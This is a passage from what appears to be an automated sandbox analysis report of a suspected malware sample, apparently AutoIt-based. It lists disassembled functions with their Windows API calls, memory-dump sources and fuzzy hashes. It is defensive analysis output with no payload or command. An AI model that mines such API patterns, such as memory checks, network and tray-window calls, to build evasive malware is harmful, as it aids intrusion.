                                                                                                                                                                  • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                                                                                                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                                  Function 0042226B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000080,00000000,PI,00000001,?,?,00000000,?,0042D7C1,?,0042D7C1,00490D50,?,?,00000000,00000002), ref: 00422373
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00422391
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                  • String ID: PI
                                                                                                                                                                  • API String ID: 203985260-693334235
                                                                                                                                                                  • Opcode ID: 77a505053532826b6252e66309e83475728e4269b05e0448849bd4dba9a5329f
                                                                                                                                                                  • Instruction ID: f6cfcdd0da1bff07fd8c4de5175f2d601c9d85045a190aa3ed4ed41793fd0dcc
                                                                                                                                                                  • Opcode Fuzzy Hash: 77a505053532826b6252e66309e83475728e4269b05e0448849bd4dba9a5329f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41B631700165FFCB20EF68EA809AF3775EB41314B9001ABF9205B291D7BD9D8197BA
                                                                                                                                                                  Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: '
                                                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                                                  Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: Combobox
                                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                                  • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                  • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                                  Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                                                  • String ID: edit
                                                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                                                  • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                  • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                                  • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                  • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                                                  Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                                  • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                  • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                                                  • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                  • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                                                  Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                                                  • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                  • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                                                  • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                                                  Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InternetOpen
                                                                                                                                                                  • String ID: <local>
                                                                                                                                                                  • API String ID: 2038078732-4266983199
                                                                                                                                                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                  Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                                                                  • wsprintfW.USER32 ref: 0045612A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendwsprintf
                                                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                                                  • API String ID: 3751067900-328681919
                                                                                                                                                                  • Opcode ID: 321bcc2f6f15520e97259caa3fb25818764353fe0c17d2506223548ca7eb1d08
                                                                                                                                                                  • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                                                  • Opcode Fuzzy Hash: 321bcc2f6f15520e97259caa3fb25818764353fe0c17d2506223548ca7eb1d08
                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                                                                  Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                                                  • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                                  • String ID: aeB
                                                                                                                                                                  • API String ID: 857135153-906807131
                                                                                                                                                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                                                  Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                                                  • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                  • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                  • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                                                  • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                  • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                                                  Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                  • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                  • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                  • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                                                  Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                                  • String ID: aut
                                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                                  • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                                  • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                                                                                  • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                                  • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                                                                  Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
